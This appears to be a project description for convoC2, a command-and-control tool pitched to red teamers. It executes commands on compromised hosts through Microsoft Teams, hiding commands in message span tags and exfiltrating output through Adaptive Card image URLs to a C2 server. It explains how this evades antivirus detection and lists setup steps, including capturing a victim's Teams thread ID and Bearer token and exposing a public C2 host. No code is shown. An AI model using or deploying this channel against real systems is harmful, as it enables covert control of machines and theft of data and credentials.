convoC2: execute system commands on compromised hosts through Microsoft Teams
convoC2
Command and Control infrastructure that allows Red Teamers to execute system commands on compromised hosts through Microsoft Teams. It infiltrates data into hidden span tags in Microsoft Teams messages and exfiltrates command outputs in Adaptive Cards image URLs, triggering out-of-bound requests to a C2 server. The lack of direct communication between the victim and the attacker and the fact that the victim only sends http requests to Microsoft servers and antiviruses don’t look into MS Teams log files makes detection more difficult.
Requirements
To get it working, you will need to set up a few things:
- Create Teams channel with Workflow Incoming Webhook: this is the place where the adaptive cards containing the output will be received. It is important to keep a browser window with this channel opened while using the server, otherwise the server will not receive messages from the agents.
- Fetch Ids and Auth Token: Teams initializes a chat with a POST to
https://teams.microsoft.com/api/chatsvc/emea/v1/threadswith the unique ids of the victim and the attacker in the body. In the response, the threadId will be returned in the path of the Location header url. The Bearer token of the same request is used to authenticate tohttps://teams.microsoft.com/api/chatsvc/emea/v1/users/ME/conversations/<threadId>/messages, which is the endpoint for sending messages. So we just need to grab these three things and the server will take care of the rest. - Make sure you have a public facing host allowing inbound HTTP traffic on port 80.
- Teams needs to be running on the victim host, in the background is fine too.
After starting the server you can receive new agents and control them, using the data previously obtained for authentication. Check the demo out for a usage example.
